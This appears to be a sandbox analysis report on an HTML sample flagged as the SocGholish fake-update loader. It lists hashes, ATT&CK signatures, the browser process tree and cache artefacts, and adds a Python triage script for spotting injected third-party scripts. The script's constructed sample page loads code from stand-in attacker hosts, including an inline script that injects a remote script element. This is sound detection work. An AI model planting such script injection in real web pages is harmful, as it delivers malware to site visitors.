Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
  • submitted
    10-01-2025 02:57

General

  • Target

    JaffaCakes118_d920953565e1feb48abf2a42c582399b.html

  • Size

    53KB

  • MD5

    d920953565e1feb48abf2a42c582399b

  • SHA1

    ba9be89163dadacc08af25d492209942c1660308

  • SHA256

    6999a2bf6cc82e577d8f794c1b583bc488d8caa6733f716bba2f1c74d1a1ed6f

  • SHA512

    3a8f1c4f876ff025becadab91d5f0aaaddd3030b2dbe5e1e6a52ce7d9dffbd74c81d4c9ca4c0f55cd712290f8300a314939e49a06244ad975cd4c80e72b8a1f1

  • SSDEEP

    768:G+ThZyHHvPW1ZRM4zL44EEgNR5QusdRrgEBDQ57/EwhVXca+qs1clP2R2Y:7hQHH21rJzLwEgNR5QusdlP25lf+Cly

Malware Config

Signatures

  • SocGholish

SocGholish (also tracked as FakeUpdates) is a JavaScript loader, typically delivered through a script injected into a compromised website and presented as a fake browser update, that downloads and runs follow-on malware.

  • Socgholish family
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempts to gather information about the system language of the victim host in order to infer its geographical location (ATT&CK T1614.001).

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
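
The process tree below shows only iexplore.exe and its normal tab process (the SCODEF/CREDAT child); no script host was spawned, so the SocGholish verdict rests on the content of the HTML file rather than on runtime behaviour. The following Python is an added triage example, not part of the sandbox report: it confirms that the file in hand is the one the report analysed by checking it against the digests from the General section, then statically extracts the page's script elements and flags external script sources that load from a host other than the page's own, which is how an injected SocGholish loader is delivered. The sample HTML, the hostnames (`.invalid` TLD) and the function names are constructed for the example.

```python
"""Offline triage helpers for an HTML sample flagged as SocGholish.

Added example (not the sandbox's or the report's own code): verify the
sample's identity against the report's digests, then pull out <script>
elements for manual inspection.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Digests copied from the report's General section for the target file.
REPORT_DIGESTS = {
    "md5": "d920953565e1feb48abf2a42c582399b",
    "sha1": "ba9be89163dadacc08af25d492209942c1660308",
    "sha256": "6999a2bf6cc82e577d8f794c1b583bc488d8caa6733f716bba2f1c74d1a1ed6f",
}

# Constructed sample page: one same-origin script, one third-party script,
# one inline script that builds a further script element at runtime.
SAMPLE_HTML = """<html><head>
<script src="/assets/site.js"></script>
<script src="https://cdn.example-attacker.invalid/update.js"></script>
<script>var s = document.createElement('script');
s.src = '//loader.example-attacker.invalid/x.js'; document.head.appendChild(s);</script>
</head><body></body></html>"""


def compute_digests(data: bytes) -> dict:
    """Return hex MD5/SHA1/SHA256/SHA512 of the bytes, keyed like the report."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256", "sha512")}


def verify_digests(data: bytes, expected: dict) -> list:
    """Return (algorithm, expected, actual) for every mismatching algorithm.

    An empty list means every algorithm present in `expected` matched, i.e.
    the bytes in hand are the file the report describes.
    """
    actual = compute_digests(data)
    return [(alg, exp, actual[alg])
            for alg, exp in expected.items() if actual[alg] != exp]


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # src values of <script src=...>
        self.inline = []        # bodies of <script> elements without src
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as CDATA through handle_data.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf).strip())
            self._in_inline = False


def extract_scripts(html: str) -> dict:
    """Parse the page once and return its external and inline scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return {"external": parser.external, "inline": parser.inline}


def third_party_scripts(html: str, page_host: str) -> list:
    """Return external script URLs whose host differs from the page's host.

    Relative and same-host sources are ignored; protocol-relative URLs
    (//host/path) are resolved to their host by urlparse.
    """
    hits = []
    for src in extract_scripts(html)["external"]:
        host = urlparse(src).hostname
        if host and host.lower() != page_host.lower():
            hits.append(src)
    return hits


if __name__ == "__main__":
    data = SAMPLE_HTML.encode()
    for alg, exp, got in verify_digests(data, REPORT_DIGESTS):
        print(f"{alg} mismatch: report {exp}, file {got}")
    print("third-party scripts:",
          third_party_scripts(SAMPLE_HTML, "www.compromised-site.invalid"))
    for body in extract_scripts(SAMPLE_HTML)["inline"]:
        print("inline script:", body)
```

Run it against the real file by replacing `SAMPLE_HTML` with the file's bytes decoded as text; a non-empty `verify_digests` result means the file differs from the one the sandbox ran, and any inline script that assembles a further script element at runtime (as the constructed sample does) deserves the same scrutiny as a cross-origin `src`, since a static parser only sees the literal tags.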

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d920953565e1feb48abf2a42c582399b.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:472
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:472 CREDAT:275457 /prefetch:2
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2428

Network

MITRE ATT&CK Enterprise v15

Downloads

  Note: the CryptnetUrlCache Content and MetaData entries below are written by Windows CryptoAPI when it fetches certificate, CRL or OCSP data during revocation checking, and the Cab*.tmp / Tar*.tmp pair in %TEMP% is typically the cabinet downloaded and unpacked by the automatic root certificate update. They are side effects of the browser session, not payloads dropped by the sample. The repeated MetaData\94308059B57B3142E455B38A6EB92015 entries (same path and size, different hashes) are successive states of one cache file captured as it was rewritten during the run.

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    5fc6ec83d0ce1616da8090e121e5fcb4

    SHA1

    a1dc0c7cf0a8ae298a4434a9036f7ed03adbed89

    SHA256

    48987d21a25b7b95886240c9f7b2addf32fb430e1b23b02e859bd0fbf7b63224

    SHA512

    0cd9715bef597a108bc2cbe023ea4ceb5f21eaa2f84e2edbcad9b2e8ebbce32b441504ce2e418d84a5bb07b73090072de7d18ae3376dfaf507990ddeccff8945

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

    Filesize

    914B

    MD5

    e4a68ac854ac5242460afd72481b2a44

    SHA1

    df3c24f9bfd666761b268073fe06d1cc8d4f82a4

    SHA256

    cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

    SHA512

    5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_DFB78462C65FAC2750B89E1A8A1F9A53

    Filesize

    471B

    MD5

    448fe5f76a909bc1299d42b10e2ea376

    SHA1

    769ecdea5641f149939b94ccb8ba04a84ffce42c

    SHA256

    ee85a9034e47062eb66c5047e0793be7e3010ce383ffa8f628be0d1c89fb3634

    SHA512

    4be280bf1f36103c223526a5608def81921a60043f080492594736599fce4ca66e471995c84b770b5e5c0bfc3937c5c6de145fb2b8ed5f5b62e157c91b0d43df

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

    Filesize

    252B

    MD5

    3544bd54f30bc896dbd1d4dfc6b31c3f

    SHA1

    ab2f7fc13b7db04a51fd079f1c27a9df4de2951f

    SHA256

    9bbf2703647da3b8e3f58ad1e482d8fbf3b327dc0817872101e851d50ea99eed

    SHA512

    e0690af574948f6145e21b96372b6169c8efbe5814efa424a63ced17a7038351d151fb6291d8cab57330eecfcba40977bb75b1014eb9917a0952f773d02dc069

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5abb4f385bc91d07ed712de1a4dd46b8

    SHA1

    256a0c6224b35ecd3b686f2448f7c26053224dde

    SHA256

    6e8c122784fee291e1d37d4ff4477ea2823f196218e9816c2379413555d0be39

    SHA512

    2abea65e4065f2aab4be5a69f69e32aee9cc9f77b9d560346f4816a6a177b8fe76c1c468bd15f47b8c826cc3ce00481fd958f31b4e2cbdbf4c7670b770d0bec9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    647386b25aded9c8fe95d6735e92969c

    SHA1

    21f5ff5efe2da10cbe10e505f60e3a527e36a5b2

    SHA256

    6935dd6167120aa872c5d669b47129a63a573854c86e59d48b8603e4907909f4

    SHA512

    820035157ef82dc463c4f2525cabb2737620e446af55b86ab4afc5d25896c1cd3ca329dce0fa91f59b35455880a46e7a846b0e3c121fe686964c05d86e137222

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    879da09c6694be962ed3c8ac6dd17a57

    SHA1

    302853d9efecdfef908820aaf2f89c5d9e5b7dcc

    SHA256

    a65f97f334a534fb0713608774aa6f96b3845e5b685a256c11da7ed7210eebd5

    SHA512

    31e3d0fa7933586c2d7f621041b2659dc4ac8dc7186b08afb2feea8a4b1fd00fec6c2b6e99a7a7580b87bb81fb8624351c3918bcc51ba4bacf24687de565d747

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3a976dc7ae78d4a2ef35aac05ee91254

    SHA1

    fe5dd9728e173733444187ebacaf5671fbb80925

    SHA256

    079a35faf2fe39ada4d424155335abdbca3ac9267d6de8782502eb119802a62b

    SHA512

    5e21a11ed04822ee5345f56acd8752ce6f940c3bb4b81e05428cd9db09cc59ae100950a6be018cc3e38ecee02bbd5c948ea3a745d9d65103fc7d0853fe46f859

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    108dee58f9cd1ed068e2de8d1d36fec9

    SHA1

    cddc8031a1e9eb768bb7b1ec3d75f248c8a6cc8e

    SHA256

    cf6dc3a713a6d18b3679b6f80f1258270c3d7465615f606bfac4cd6f7d0440ac

    SHA512

    0779121f7ed1f3eb161c2fd946a2fd2648eb50bd6b31b5ce70a6446486922f94ab3c3672e5a0991ad847d61ed5d3b9ef469fe21fe6ecb44c0dccff8dd16647b5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    1cc7e9a77b6974f395a1a4463e423cdd

    SHA1

    6444ba5729c68e5754422a444054445fc4e9f260

    SHA256

    4866aaf8ec241dc02a894d04c4e6f3aaeb925ef4605b1fc40d654decab0710f6

    SHA512

    fc1c867ac24151b20f7fb872cae49c773dd6d7c17a189c01d2345eefd384d99d1c0161a7f5471829cd5d22b4efb4f7df8afe082e6eff8c773b5c8a1f6123b89b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    89145560dec9169880f51dce95e5edf0

    SHA1

    759870783ca6ecafd38349d7dea8e84778b9c971

    SHA256

    af541b35716186666add718a3f68a69b89794d9b2ce6d581898d3886783a1a0d

    SHA512

    124e9a5f39591c325d38ab602b2ca8e47380e2231eeba23aeebc0392974f996b2c1451927d66a5f34cc27cf422e0319b94be8caa5a90b8e308465cffe1715a29

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c2aeda0059aec266f8e7c9855de14cda

    SHA1

    c85e504a50d54e07461b6916bc5394fe70699b76

    SHA256

    358fc09cf54bafdbda1d0cbf0ab3e2edab03f6fc3354a7ea5821e7b52bfeb3fa

    SHA512

    7e6ab0749d2cec2564d8aca7c84c4a66eb665e2cb4092357d98db55da8d89364e23e1fbd9fd247768beaa48ec4ed046505a77afa0aae004c13f31ce1bb3cfdea

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    21be8d6b0ad715881f85afed5e441284

    SHA1

    554e02a0e539611ea48cfd4aec220190aaa4686c

    SHA256

    5c55c764964e1aac8284800cc12e8b65daf2e047e790c42866fc221d052db33b

    SHA512

    89b41002833a2cfa476b9f4de21ee45cfbabfaefac73d381125372d4eeb49de55e37a12d17f6de9551d274a65a72c6f2a39d22c529b819a7b3a73965c23fbcac

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ea24e95608a375b078ba876483d6750d

    SHA1

    44b2628919671b9458a4114a92a1e0bb9e7945b1

    SHA256

    3c9f8d420eb9d74466a83d6741dc812830f64f1cbeffa1220b9762cbed9c9410

    SHA512

    a99a0841e7f0613c5f253371d22b5134318f7ad8b42991ee06300718f2710eeed0147eabea2bafa8076cc74e38e07a67b753549b721c1b32b5dadc104631e8c2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    a69257a766442f581dba4b2503cbfd4f

    SHA1

    2067c79a0eb0b99301fd88e7cdfb5080b057d827

    SHA256

    999ca6a2072e0aee4c33d23a15a96ee5be97244f2694aaefa20e13e86429fb07

    SHA512

    55df1481f3401b044dad5b8f7de2eb426ca58f4e42b21fb1cba132c57ccd9891c8dcd29f5102021cce7edb188bacb3aaab73f94ab157ef00218bf8f251cc5050

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    0680f1056f407d0e65dbd6ead79c4a69

    SHA1

    3ec016621f71cd914aafe450188b6b84dce16eec

    SHA256

    8ea8dbb183c51a667298865090e4a17fe1fb10577a3d065318d3b9d545de8881

    SHA512

    3d0905250a59a194ca69fd7b070a7efec443b3bdb16cdec1f609a9cf7ec9854362bda8ef19cde846f20b5cf251eb7ce5bbf82cbb727d641a4a98534f876d3a6a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f2df8472de5c11289992c2e194fac3c4

    SHA1

    0d0fbc041f6d4364afbc73dabdeae663af545532

    SHA256

    27eea40cee3bb50da6d728aa3f22d2722f567af129db10c1bee8e0b32b4f485f

    SHA512

    3f45ee193cc97fe4582d7cf99e24de3344bf1e20024aa487199f9564231a74954855faf488169be94b3e81b3bc10ff5aed5ef0f8867d6b41257d7517e1738535

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2f5f16d11dc053770a297369c351b97e

    SHA1

    51fd25659f5f568ae84e00045013b690ad296882

    SHA256

    219d68bd7b4fa730c35e619d63e46c70e8e96bf6efaf155f87bece7f26eb05e4

    SHA512

    77711fe75ed6b61c16ce0c8f82e830ae7fa93013a64fa377e844d7cc5cd88b69f988ea975bc206913c38b1720887f11d732da960b66b7b4e8ce82247bebf09f4

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    bf18f60976862c574ff2ccc048bce911

    SHA1

    d75d0ec87497ee55967670bde8863eefcfefad54

    SHA256

    db4796fda07cd41f87b1f61288a0c0dd3de5d31ab9b190dca1ff6b8c3be7c598

    SHA512

    e6613ce2cd260aca51724db9d5c16a8fb24cd061e70a940f9c011ea3159090f64c6dfd968053d12fb74261aec48053f8a048d139993b61edad04cf5a7d722893

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    280f1df028dab3d325a1efa6e3d0dae0

    SHA1

    a1c9bec6ceb75bcd889b2ba808bb8f8487086f02

    SHA256

    15022f84b26bf85d7367001cef23db6f9cbba4d348978266ef1a07aa92607a3f

    SHA512

    808763dbfce9a0856888a6b3aea3e98163b7ab73c15b8dad27492e0975595d9d537c60972977c70d8e294c355c9c5a81099ef0d023618c78bbf024d23a9a053a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_DFB78462C65FAC2750B89E1A8A1F9A53

    Filesize

    406B

    MD5

    6046f6e111a1d2d7179e377fc99fc23a

    SHA1

    9fc5cb40e9108703ae2070dcfd151cc334f330dc

    SHA256

    1dfbf82f6f5387137e9dd66de88b479eed013cd9882fbdb59f4b9145df85a96c

    SHA512

    75b0d13261757564f6e868ca48a56d32804cdf0dab576a5b0d26a86f7f1a6c80904eef82984a67c5e0f7714969a2410d3fa114482febd1af40bd6e8ad842c10d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    86d7583cbc0b15c3cbec54240961ddfa

    SHA1

    41103dadd5032c4e69b688394fdad1756b83f14f

    SHA256

    3f5051a24afbef93c3cfc9ba38081c8bea605615a444d7e58c033898972ea52d

    SHA512

    e50d6027a1ec7f3481a0befe0d0edd0a1f5b394d652048e90845f60347a3e9162c33ae3c1fa1feded53000c9fcd09bcb915fb770f1dcec15c6ab436c3c0fd11b

  • C:\Users\Admin\AppData\Local\Temp\Cab7753.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar7756.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b